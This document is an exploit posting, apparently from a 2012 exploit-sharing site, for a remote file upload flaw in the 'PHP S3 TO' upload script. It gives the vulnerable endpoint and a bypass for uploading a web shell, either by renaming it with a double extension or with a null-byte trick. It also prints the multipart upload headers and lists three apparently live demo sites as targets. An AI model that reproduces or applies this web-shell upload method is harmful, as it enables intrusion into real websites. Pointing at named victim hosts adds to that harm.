Home / exploits php.s3.to Upload Script Shell Upload
Posted on 21 August 2012
###################################### Explit Title : "PHP S3 TO" Remote File Upload Download : http://php.s3.to/script.php Author : MR.XpR Test on : LinuX R3dH4t Bug discovered by : IRANHACK SecuRITY TEAM ##################################### [+] Exploit : [Protocol]Site.CoM/[dir]/up/upload.php -------------------------------------------------------------- [+] Load files From : [Protocol]Site.CoM/[dir]/up/img/Sh3ll.php.jpg -------------------------------------------------------------- [+] Demo : http://security2600.sakura.ne.jp/up/upload.php http://omame.dnsalias.net/up/upload.php http://diaros.net/up/upload.php -------------------------------------------------------------- [+] Information : This Bug Uploading a TxT , PhP , JpG , PNg change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg If Doesn't Work Use Tamper Data FireFox Plugin -------------------------------------------------------------- [+] Upload Headers : 114782935826962 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1048576 -1147829358 26962 Content-Disposition: form-data;name="upfile"; filename="sh3ll.php.jpg" Content-Type: text/plain -----------------------------114782935826962 Content-Disposition: form-data; name="pass" --114782935826962 Content-Disposition:form-data; name="com" -----------------------------114782935826962-- [+] Special TnX To : Mr.XpR - Syamak Black - UnknowN - MR.EBI - Farbod Ezaril - Samim.s Saman Biliz - Sianor - Cair3x - M.R.S.C.0 - Bl4ck.Viper - Black King Yaghi vahghi - H3llboy - inj3ct0r - Netqurd - Fixxer- R3ZA BLACK HAT IRIST - Sokote.vahshat - TBH - IBH - IRH - ArYaIeIrAN - W0lf - Ajax TM joker_s - mr.4lir3z4 - nimaarek - All iranian Hackerz
